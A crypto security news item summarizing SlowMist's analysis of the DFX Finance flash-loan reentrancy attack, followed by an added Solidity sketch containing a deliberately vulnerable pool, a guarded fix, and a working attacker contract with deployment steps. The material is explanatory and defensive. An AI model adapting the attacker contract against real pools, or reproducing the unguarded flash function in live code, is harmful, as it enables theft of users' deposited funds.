SlowMist: DFX Finance Attacked Due to Lack of Reentrancy Protection in Curve Contract Flash Loan Function
ChainCatcher news: according to intelligence from the SlowMist security team, the DFX Finance project on the ETH chain was attacked, with the attacker profiting approximately $231,138. The SlowMist security team shared the following brief analysis:
The attacker first called the viewDeposit function of a contract named Curve to check the state of deposits in that contract, and then, based on the returned state, worked out the appropriate amount to borrow via flash loan.
Next, they called the flash function of the Curve contract to take the flash loan. Since this function had no reentrancy lock, the attacker used the flash loan's flashCallback function to call the contract's deposit function and make a deposit.
The deposit function externally called the proportionalDeposit function of the ProportionalLiquidity contract, which transferred the funds borrowed in step two back to the Curve contract, recorded the deposit for the attacking contract, and minted deposit receipts to it.
By reentering the deposit function to transfer the funds back to the Curve contract, the attacker passed the flash loan's repayment balance check.
Finally, they called the withdraw function. During the withdrawal, the deposit receipts minted to the attacking contract in step three were burned, and the attacker withdrew approximately 2,283,092,402 XIDR tokens and 99,866 USDC tokens as profit.
The root cause of this attack is that the flash loan function of the Curve contract did not implement reentrancy protection, which allowed the attacker to reenter the deposit function, transfer the tokens back, and pass the flash loan's repayment balance check. Because the deposit had been recorded, the attacker could then withdraw it and profit.
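The following Solidity sketch is an added illustration of the call flow described above (flash, then flashCallback reentering deposit, then withdraw); it is not DFX Finance's or SlowMist's code. It reduces the Curve contract to a single-token pool with no flash fee, folds what proportionalDeposit does (pull tokens in, record the deposit, mint receipts) into one deposit function, and uses assumed names (Pool, Attacker, flashGuarded, receipts). The vulnerable flash function sits beside a guarded version so the effect of the missing lock is visible in one place.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Added illustration of the DFX Finance flash-loan reentrancy, not the project's
// code. Single-token pool, no flash fee; names are assumed for the example.

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
}

interface IFlashCallback {
    function flashCallback(uint256 amount, bytes calldata data) external;
}

contract Pool {
    IERC20 public immutable token;
    mapping(address => uint256) public receipts; // deposit receipts per depositor
    bool private locked;

    constructor(IERC20 _token) { token = _token; }

    // Shared lock: a guarded function refuses to run while another guarded
    // function is still on the call stack.
    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    // Pulls tokens from the caller and records a receipt for them.
    function deposit(uint256 amount) external nonReentrant {
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        receipts[msg.sender] += amount;
    }

    // Burns receipts and pays the caller out.
    function withdraw(uint256 amount) external nonReentrant {
        receipts[msg.sender] -= amount; // reverts on underflow in 0.8.x
        require(token.transfer(msg.sender, amount), "transfer failed");
    }

    // VULNERABLE: lends first, calls back, then only compares balances.
    // Nothing stops the callback from re-entering deposit(), so the loan is
    // "repaid" by a deposit that also mints receipts the attacker keeps.
    function flash(address recipient, uint256 amount, bytes calldata data) external {
        uint256 balanceBefore = token.balanceOf(address(this));
        require(token.transfer(recipient, amount), "lend failed");
        IFlashCallback(recipient).flashCallback(amount, data);
        require(token.balanceOf(address(this)) >= balanceBefore, "flash loan not repaid");
    }

    // FIXED: the same logic under the shared lock. deposit() called from the
    // callback now hits the lock and reverts, which unwinds the whole flash.
    function flashGuarded(address recipient, uint256 amount, bytes calldata data) external nonReentrant {
        uint256 balanceBefore = token.balanceOf(address(this));
        require(token.transfer(recipient, amount), "lend failed");
        IFlashCallback(recipient).flashCallback(amount, data);
        require(token.balanceOf(address(this)) >= balanceBefore, "flash loan not repaid");
    }
}

// The attacking contract: flash -> flashCallback -> deposit (reentry) -> withdraw.
contract Attacker is IFlashCallback {
    Pool private immutable pool;
    IERC20 private immutable token;

    constructor(Pool _pool) {
        pool = _pool;
        token = _pool.token();
    }

    function attack(uint256 amount) external {
        pool.flash(address(this), amount, "");  // pool lends `amount` to this contract
        pool.withdraw(amount);                   // burn the receipts minted during the loan
        token.transfer(msg.sender, token.balanceOf(address(this))); // pocket the pool's tokens
    }

    function flashCallback(uint256 amount, bytes calldata) external override {
        require(msg.sender == address(pool), "not pool");
        token.approve(address(pool), amount);
        pool.deposit(amount); // re-enters the pool: repays the loan AND mints receipts
    }
}
```

Deploy Pool with an ERC-20, fund it, deploy Attacker against it and call attack(amount): flash's balance check passes because deposit moved the borrowed tokens straight back into the pool, and the subsequent withdraw drains `amount` from the pool's own reserves. Replace the call in attack with flashGuarded and the reentrant deposit reverts on the lock, so the whole transaction fails. Two practical points follow from the sketch: the lock must be shared by every state-changing entry point (a lock on flash alone would not stop deposit), and a repayment check based on raw token balances cannot tell a repayment from a deposit, so the repayment path should be one the callback cannot satisfy through other accounting.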